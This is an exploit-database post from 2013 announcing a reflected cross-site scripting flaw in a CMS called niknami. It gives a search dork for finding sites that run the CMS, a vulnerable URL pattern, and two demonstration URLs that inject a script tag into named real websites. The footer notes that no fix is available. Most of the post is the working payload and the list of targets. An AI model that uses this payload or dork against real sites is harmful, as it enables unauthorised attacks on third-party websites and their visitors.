niknami Cms Cross-Site Scripting Vulnerabilities

2013-08-22 17:49:21
Inviato da: irist.ir

#################################

# Iranian Exploit DataBase Forum

# http://iedb.ir/acc

# http://iedb.ir

#################################

# Exploit Title : niknami Cms Cross-Site Scripting Vulnerabilities

# Author : Iranian Exploit DataBase

# Discovered By : IeDb

# Email : [email protected]

# Home : http://iedb.ir - http://iedb.ir/acc

# Software Link : http://www.niknami.ir/

# Security Risk : High

# Tested on : Linux

# Dork : "Design: Niknami.ir"

#################################

# Exploit :

# http://www.Site.com/show.php?page=newbooks&id=[Xss]

# Dem0 :

# http://15khordad42.ir/show.php?page=newbooks&id=202"><script>alert(/IeDb.Ir/)</script>

# http://www.oral-history.ir/show.php?page=newbooks&id=202"><script>alert(/IeDb.Ir/)</script>

#################################

# Exploit Archive = http://www.iedb.ir/exploits-400.html

#################################

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.